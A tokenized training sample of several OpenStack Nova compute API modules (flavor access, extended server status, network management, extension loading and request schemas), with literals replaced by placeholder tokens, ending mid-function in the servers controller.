<EOL> exp = _ ( "<STR_LIT>" ) <EOL> raise webob . exc . HTTPConflict ( explanation = exp ) <EOL> flavor . add_access ( tenant ) <EOL> except exception . FlavorNotFound as e : <EOL> raise webob . exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . FlavorAccessExists as err : <EOL> raise webob . exc . HTTPConflict ( explanation = err . format_message ( ) ) <EOL> except exception . AdminRequired as e : <EOL> raise webob . exc . HTTPForbidden ( explanation = e . format_message ( ) ) <EOL> return _marshall_flavor_access ( flavor ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( "<STR_LIT>" ) <EOL> @ validation . schema ( flavor_access . remove_tenant_access ) <EOL> def _remove_tenant_access ( self , req , id , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> vals = body [ '<STR_LIT>' ] <EOL> tenant = vals [ '<STR_LIT>' ] <EOL> flavor = objects . Flavor ( context = context , flavorid = id ) <EOL> try : <EOL> flavor . remove_access ( tenant ) <EOL> except ( exception . FlavorAccessNotFound , <EOL> exception . FlavorNotFound ) as e : <EOL> raise webob . exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . AdminRequired as e : <EOL> raise webob . exc . HTTPForbidden ( explanation = e . format_message ( ) ) <EOL> return _marshall_flavor_access ( flavor ) <EOL> class FlavorAccess ( extensions . V21APIExtensionBase ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> alias = ALIAS <EOL> version = <NUM_LIT:1> <EOL> def get_resources ( self ) : <EOL> res = extensions . ResourceExtension ( <EOL> ALIAS , <EOL> controller = FlavorAccessController ( ) , <EOL> parent = dict ( member_name = '<STR_LIT>' , collection_name = '<STR_LIT>' ) ) <EOL> return [ res ] <EOL> def get_controller_extensions ( self ) : <EOL> extension = extensions . ControllerExtension ( <EOL> self , '<STR_LIT>' , FlavorActionController ( ) ) <EOL> return [ extension ] </s>
<s> from nova . api . openstack import extensions <EOL> class Baremetal_ext_status ( extensions . ExtensionDescriptor ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> alias = "<STR_LIT>" <EOL> namespace = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> updated = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from nova . api . openstack import extensions <EOL> from nova . api . openstack import wsgi <EOL> authorize = extensions . soft_extension_authorizer ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class ExtendedStatusController ( wsgi . Controller ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ExtendedStatusController , self ) . __init__ ( * args , ** kwargs ) <EOL> def _extend_server ( self , server , instance ) : <EOL> for state in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> key = "<STR_LIT>" % ( Extended_status . alias , state ) <EOL> server [ key ] = instance [ state ] <EOL> @ wsgi . extends <EOL> def show ( self , req , resp_obj , id ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> if authorize ( context ) : <EOL> server = resp_obj . obj [ '<STR_LIT>' ] <EOL> db_instance = req . get_db_instance ( server [ '<STR_LIT:id>' ] ) <EOL> self . _extend_server ( server , db_instance ) <EOL> @ wsgi . extends <EOL> def detail ( self , req , resp_obj ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> if authorize ( context ) : <EOL> servers = list ( resp_obj . obj [ '<STR_LIT>' ] ) <EOL> for server in servers : <EOL> db_instance = req . get_db_instance ( server [ '<STR_LIT:id>' ] ) <EOL> self . _extend_server ( server , db_instance ) <EOL> class Extended_status ( extensions . ExtensionDescriptor ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> alias = "<STR_LIT>" <EOL> namespace = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> updated = "<STR_LIT>" <EOL> def get_controller_extensions ( self ) : <EOL> controller = ExtendedStatusController ( ) <EOL> extension = extensions . ControllerExtension ( self , '<STR_LIT>' , controller ) <EOL> return [ extension ] </s>
<s> import netaddr <EOL> import webob <EOL> from webob import exc <EOL> from nova . api . openstack import extensions <EOL> from nova . api . openstack import wsgi <EOL> from nova import context as nova_context <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import network <EOL> from nova . objects import base as base_obj <EOL> from nova . objects import fields as obj_fields <EOL> authorize = extensions . extension_authorizer ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> authorize_view = extensions . extension_authorizer ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> extended_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def network_dict ( context , network , extended ) : <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' ) <EOL> admin_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:host>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> if network : <EOL> if context . is_admin : <EOL> fields += admin_fields <EOL> if extended : <EOL> fields += extended_fields <EOL> is_obj = isinstance ( network , base_obj . NovaObject ) <EOL> result = { } <EOL> for field in fields : <EOL> if is_obj and isinstance ( network . fields [ field ] . AUTO_TYPE , <EOL> obj_fields . IPAddress ) : <EOL> val = network . get ( field , None ) <EOL> if val is not None : <EOL> result [ field ] = str ( val ) <EOL> else : <EOL> result [ field ] = val <EOL> else : <EOL> result [ field ] = network . get ( field , None ) <EOL> uuid = network . get ( '<STR_LIT>' ) <EOL> if uuid : <EOL> result [ '<STR_LIT:id>' ] = uuid <EOL> return result <EOL> else : <EOL> return { } <EOL> class NetworkController ( wsgi . Controller ) : <EOL> def __init__ ( self , network_api = None , ext_mgr = None ) : <EOL> self . network_api = network_api or network . API ( ) <EOL> if ext_mgr : <EOL> self . extended = ext_mgr . is_loaded ( '<STR_LIT>' ) <EOL> else : <EOL> self . extended = False <EOL> def index ( self , req ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize_view ( context ) <EOL> networks = self . network_api . get_all ( context ) <EOL> result = [ network_dict ( context , net_ref , self . extended ) <EOL> for net_ref in networks ] <EOL> return { '<STR_LIT>' : result } <EOL> @ wsgi . action ( "<STR_LIT>" ) <EOL> def _disassociate_host_and_project ( self , req , id , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> nova_context . require_admin_context ( context ) <EOL> try : <EOL> self . network_api . associate ( context , id , host = None , project = None ) <EOL> except exception . NetworkNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> except NotImplementedError : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise exc . HTTPNotImplemented ( explanation = msg ) <EOL> return webob . Response ( status_int = <NUM_LIT> ) <EOL> def show ( self , req , id ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize_view ( context ) <EOL> try : <EOL> network = self . network_api . get ( context , id ) <EOL> except exception . NetworkNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> return { '<STR_LIT>' : network_dict ( context , network , self . extended ) } <EOL> def delete ( self , req , id ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> try : <EOL> self . network_api . delete ( context , id ) <EOL> except exception . NetworkInUse as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . NetworkNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> return webob . Response ( status_int = <NUM_LIT> ) <EOL> def create ( self , req , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> nova_context . require_admin_context ( context ) <EOL> def bad ( e ) : <EOL> return exc . HTTPBadRequest ( explanation = e ) <EOL> if not ( body and body . get ( "<STR_LIT>" ) ) : <EOL> raise bad ( _ ( "<STR_LIT>" ) ) <EOL> params = body [ "<STR_LIT>" ] <EOL> if not params . get ( "<STR_LIT:label>" ) : <EOL> raise bad ( _ ( "<STR_LIT>" ) ) <EOL> cidr = params . get ( "<STR_LIT>" ) or params . get ( "<STR_LIT>" ) <EOL> if not cidr : <EOL> raise bad ( _ ( "<STR_LIT>" ) ) <EOL> if params . get ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> params [ "<STR_LIT>" ] = None <EOL> params [ "<STR_LIT>" ] = <NUM_LIT:1> <EOL> try : <EOL> params [ "<STR_LIT>" ] = netaddr . IPNetwork ( cidr ) . size <EOL> except netaddr . AddrFormatError : <EOL> msg = _ ( '<STR_LIT>' ) % cidr <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> if not self . extended : <EOL> create_params = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for field in extended_fields + create_params : <EOL> if field in params : <EOL> del params [ field ] <EOL> try : <EOL> network = self . network_api . create ( context , ** params ) [ <NUM_LIT:0> ] <EOL> except ( exception . InvalidCidr , <EOL> exception . InvalidIntValue , <EOL> exception . InvalidAddress , <EOL> exception . NetworkNotCreated ) as ex : <EOL> raise exc . HTTPBadRequest ( explanation = ex . format_message ) <EOL> except exception . CidrConflict as ex : <EOL> raise exc . HTTPConflict ( explanation = ex . format_message ( ) ) <EOL> return { "<STR_LIT>" : network_dict ( context , network , self . extended ) } <EOL> def add ( self , req , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> nova_context . require_admin_context ( context ) <EOL> if not body : <EOL> raise exc . HTTPUnprocessableEntity ( ) <EOL> network_id = body . get ( '<STR_LIT:id>' , None ) <EOL> project_id = context . project_id <EOL> try : <EOL> self . network_api . add_network_to_project ( <EOL> context , project_id , network_id ) <EOL> except NotImplementedError : <EOL> msg = ( _ ( "<STR_LIT>" ) ) <EOL> raise exc . HTTPNotImplemented ( explanation = msg ) <EOL> except ( exception . NoMoreNetworks , <EOL> exception . NetworkNotFoundForUUID ) as e : <EOL> raise exc . HTTPBadRequest ( explanation = e . format_message ( ) ) <EOL> return webob . Response ( status_int = <NUM_LIT> ) <EOL> class Os_networks ( extensions . ExtensionDescriptor ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> alias = "<STR_LIT>" <EOL> namespace = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> updated = "<STR_LIT>" <EOL> def get_resources ( self ) : <EOL> member_actions = { '<STR_LIT:action>' : '<STR_LIT:POST>' } <EOL> collection_actions = { '<STR_LIT>' : '<STR_LIT:POST>' } <EOL> res = extensions . ResourceExtension ( <EOL> '<STR_LIT>' , <EOL> NetworkController ( ext_mgr = self . ext_mgr ) , <EOL> member_actions = member_actions , <EOL> collection_actions = collection_actions ) <EOL> return [ res ] </s>
<s> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from nova . api . openstack import extensions as base_extensions <EOL> from nova . i18n import _LW <EOL> STANDARD_EXTENSIONS = ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> ext_opts = [ <EOL> cfg . MultiStrOpt ( <EOL> '<STR_LIT>' , <EOL> default = [ STANDARD_EXTENSIONS ] , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> deprecated_for_removal = True ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( ext_opts ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class ExtensionManager ( base_extensions . ExtensionManager ) : <EOL> def __init__ ( self ) : <EOL> self . cls_list = CONF . osapi_compute_extension <EOL> if ( len ( self . cls_list ) > <NUM_LIT:0> and <EOL> self . cls_list [ <NUM_LIT:0> ] != STANDARD_EXTENSIONS ) : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . extensions = { } <EOL> self . sorted_ext_list = [ ] <EOL> self . _load_extensions ( ) </s>
<s> create = { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:version>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:url>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:version>' , <EOL> '<STR_LIT:url>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> update = { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:version>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:url>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT:version>' , '<STR_LIT:url>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False , <EOL> } </s>
<s> from nova . api . validation import parameter_types <EOL> associate_host = { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : parameter_types . hostname <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False <EOL> } </s>
<s> import base64 <EOL> import re <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import oslo_messaging as messaging <EOL> from oslo_utils import strutils <EOL> from oslo_utils import timeutils <EOL> from oslo_utils import uuidutils <EOL> import six <EOL> import stevedore <EOL> import webob <EOL> from webob import exc <EOL> from nova . api . openstack import api_version_request <EOL> from nova . api . openstack import common <EOL> from nova . api . openstack . compute . schemas import servers as schema_servers <EOL> from nova . api . openstack . compute . views import servers as views_servers <EOL> from nova . api . openstack import extensions <EOL> from nova . api . openstack import wsgi <EOL> from nova . api import validation <EOL> from nova import compute <EOL> from nova . compute import flavors <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova . i18n import _LW <EOL> from nova . image import glance <EOL> from nova import objects <EOL> from nova import utils <EOL> ALIAS = '<STR_LIT>' <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> authorize = extensions . os_compute_authorizer ( ALIAS ) <EOL> class ServersController ( wsgi . Controller ) : <EOL> """<STR_LIT>""" <EOL> EXTENSION_CREATE_NAMESPACE = '<STR_LIT>' <EOL> EXTENSION_REBUILD_NAMESPACE = '<STR_LIT>' <EOL> EXTENSION_UPDATE_NAMESPACE = '<STR_LIT>' <EOL> EXTENSION_RESIZE_NAMESPACE = '<STR_LIT>' <EOL> _view_builder_class = views_servers . ViewBuilderV21 <EOL> schema_server_create = schema_servers . base_create <EOL> schema_server_update = schema_servers . base_update <EOL> schema_server_rebuild = schema_servers . base_rebuild <EOL> schema_server_resize = schema_servers . base_resize <EOL> schema_server_create_v20 = schema_servers . base_create_v20 <EOL> schema_server_update_v20 = schema_servers . base_update_v20 <EOL> schema_server_rebuild_v20 = schema_servers . base_rebuild_v20 <EOL> schema_server_create_v219 = schema_servers . base_create_v219 <EOL> schema_server_update_v219 = schema_servers . base_update_v219 <EOL> schema_server_rebuild_v219 = schema_servers . base_rebuild_v219 <EOL> @ staticmethod <EOL> def _add_location ( robj ) : <EOL> if '<STR_LIT>' not in robj . obj : <EOL> return robj <EOL> link = [ l for l in robj . obj [ '<STR_LIT>' ] [ '<STR_LIT>' ] if l [ '<STR_LIT>' ] == '<STR_LIT>' ] <EOL> if link : <EOL> robj [ '<STR_LIT>' ] = utils . utf8 ( link [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> return robj <EOL> def __init__ ( self , ** kwargs ) : <EOL> def _check_load_extension ( required_function ) : <EOL> def should_load_extension ( ext ) : <EOL> whitelist = CONF . osapi_v21 . extensions_whitelist <EOL> blacklist = CONF . osapi_v21 . extensions_blacklist <EOL> if not whitelist : <EOL> if ext . obj . alias in blacklist : <EOL> return False <EOL> else : <EOL> return True <EOL> else : <EOL> if ext . obj . alias in whitelist : <EOL> if ext . obj . alias in blacklist : <EOL> LOG . warning ( <EOL> _LW ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) , <EOL> ext . obj . alias ) <EOL> return False <EOL> else : <EOL> return True <EOL> else : <EOL> return False <EOL> def check_load_extension ( ext ) : <EOL> if isinstance ( ext . obj , extensions . V21APIExtensionBase ) : <EOL> if hasattr ( ext . obj , required_function ) : <EOL> LOG . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : ext . obj . alias , <EOL> '<STR_LIT>' : required_function } ) <EOL> return should_load_extension ( ext ) <EOL> else : <EOL> LOG . debug ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : ext . obj . alias , <EOL> '<STR_LIT>' : required_function } ) <EOL> return False <EOL> else : <EOL> return False <EOL> return check_load_extension <EOL> self . extension_info = kwargs . pop ( '<STR_LIT>' ) <EOL> super ( ServersController , self ) . __init__ ( ** kwargs ) <EOL> self . compute_api = compute . API ( skip_policy_check = True ) <EOL> self . create_extension_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_CREATE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if not list ( self . create_extension_manager ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . rebuild_extension_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_REBUILD_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if not list ( self . rebuild_extension_manager ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . update_extension_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_UPDATE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if not list ( self . update_extension_manager ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . resize_extension_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_RESIZE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if not list ( self . resize_extension_manager ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . create_schema_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_CREATE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if list ( self . create_schema_manager ) : <EOL> self . create_schema_manager . map ( self . _create_extension_schema , <EOL> self . schema_server_create_v219 , <EOL> '<STR_LIT>' ) <EOL> self . create_schema_manager . map ( self . _create_extension_schema , <EOL> self . schema_server_create , '<STR_LIT>' ) <EOL> self . create_schema_manager . map ( self . _create_extension_schema , <EOL> self . schema_server_create_v20 , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . update_schema_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_UPDATE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if list ( self . update_schema_manager ) : <EOL> self . update_schema_manager . map ( self . _update_extension_schema , <EOL> self . schema_server_update_v219 , <EOL> '<STR_LIT>' ) <EOL> self . update_schema_manager . map ( self . _update_extension_schema , <EOL> self . schema_server_update , '<STR_LIT>' ) <EOL> self . update_schema_manager . map ( self . _update_extension_schema , <EOL> self . schema_server_update_v20 , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . rebuild_schema_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_REBUILD_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if list ( self . rebuild_schema_manager ) : <EOL> self . rebuild_schema_manager . map ( self . _rebuild_extension_schema , <EOL> self . schema_server_rebuild_v219 , <EOL> '<STR_LIT>' ) <EOL> self . rebuild_schema_manager . map ( self . _rebuild_extension_schema , <EOL> self . schema_server_rebuild , '<STR_LIT>' ) <EOL> self . rebuild_schema_manager . map ( self . _rebuild_extension_schema , <EOL> self . schema_server_rebuild_v20 , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . resize_schema_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_RESIZE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if list ( self . resize_schema_manager ) : <EOL> self . resize_schema_manager . map ( self . _resize_extension_schema , <EOL> self . schema_server_resize , '<STR_LIT>' ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def index ( self , req ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = "<STR_LIT:index>" ) <EOL> try : <EOL> servers = self . _get_servers ( req , is_detail = False ) <EOL> except exception . Invalid as err : <EOL> raise exc . HTTPBadRequest ( explanation = err . format_message ( ) ) <EOL> return servers <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def detail ( self , req ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> try : <EOL> servers = self . _get_servers ( req , is_detail = True ) <EOL> except exception . Invalid as err : <EOL> raise exc . HTTPBadRequest ( explanation = err . format_message ( ) ) <EOL> return servers <EOL> def _get_servers ( self , req , is_detail ) : <EOL> """<STR_LIT>""" <EOL> search_opts = { } <EOL> search_opts . update ( req . GET ) <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> remove_invalid_options ( context , search_opts , <EOL> self . _get_server_search_options ( req ) ) <EOL> search_opts . pop ( '<STR_LIT:status>' , None ) <EOL> if '<STR_LIT:status>' in req . GET . keys ( ) : <EOL> statuses = req . GET . getall ( '<STR_LIT:status>' ) <EOL> states = common . task_and_vm_state_from_status ( statuses ) <EOL> vm_state , task_state = states <EOL> if not vm_state and not task_state : <EOL> return { '<STR_LIT>' : [ ] } <EOL> search_opts [ '<STR_LIT>' ] = vm_state <EOL> if '<STR_LIT:default>' not in task_state : <EOL> search_opts [ '<STR_LIT>' ] = task_state <EOL> if '<STR_LIT>' in search_opts : <EOL> try : <EOL> parsed = timeutils . parse_isotime ( search_opts [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> search_opts [ '<STR_LIT>' ] = parsed <EOL> if '<STR_LIT>' not in search_opts : <EOL> if '<STR_LIT>' not in search_opts : <EOL> search_opts [ '<STR_LIT>' ] = False <EOL> else : <EOL> search_opts [ '<STR_LIT>' ] = strutils . bool_from_string ( <EOL> search_opts [ '<STR_LIT>' ] , default = False ) <EOL> if search_opts . get ( "<STR_LIT>" ) == [ '<STR_LIT>' ] : <EOL> if context . is_admin : <EOL> search_opts [ '<STR_LIT>' ] = True <EOL> else : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPForbidden ( explanation = msg ) <EOL> all_tenants = common . is_all_tenants ( search_opts ) <EOL> search_opts . pop ( '<STR_LIT>' , None ) <EOL> elevated = None <EOL> if all_tenants : <EOL> if is_detail : <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> else : <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> elevated = context . elevated ( ) <EOL> else : <EOL> if context . project_id : <EOL> search_opts [ '<STR_LIT>' ] = context . project_id <EOL> else : <EOL> search_opts [ '<STR_LIT>' ] = context . user_id <EOL> limit , marker = common . get_limit_and_marker ( req ) <EOL> sort_keys , sort_dirs = common . get_sort_params ( req . params ) <EOL> expected_attrs = [ '<STR_LIT>' ] <EOL> if is_detail : <EOL> expected_attrs = self . _view_builder . get_show_expected_attrs ( <EOL> expected_attrs ) <EOL> try : <EOL> instance_list = self . compute_api . get_all ( elevated or context , <EOL> search_opts = search_opts , limit = limit , marker = marker , <EOL> want_objects = True , expected_attrs = expected_attrs , <EOL> sort_keys = sort_keys , sort_dirs = sort_dirs ) <EOL> except exception . MarkerNotFound : <EOL> msg = _ ( '<STR_LIT>' ) % marker <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . FlavorNotFound : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> search_opts [ '<STR_LIT>' ] ) <EOL> instance_list = objects . InstanceList ( ) <EOL> if is_detail : <EOL> instance_list . _context = context <EOL> instance_list . fill_faults ( ) <EOL> response = self . _view_builder . detail ( req , instance_list ) <EOL> else : <EOL> response = self . _view_builder . index ( req , instance_list ) <EOL> req . cache_db_instances ( instance_list ) <EOL> return response <EOL> def _get_server ( self , context , req , instance_uuid , is_detail = False ) : <EOL> """<STR_LIT>""" <EOL> expected_attrs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if is_detail : <EOL> expected_attrs = self . _view_builder . get_show_expected_attrs ( <EOL> expected_attrs ) <EOL> instance = common . get_instance ( self . compute_api , context , <EOL> 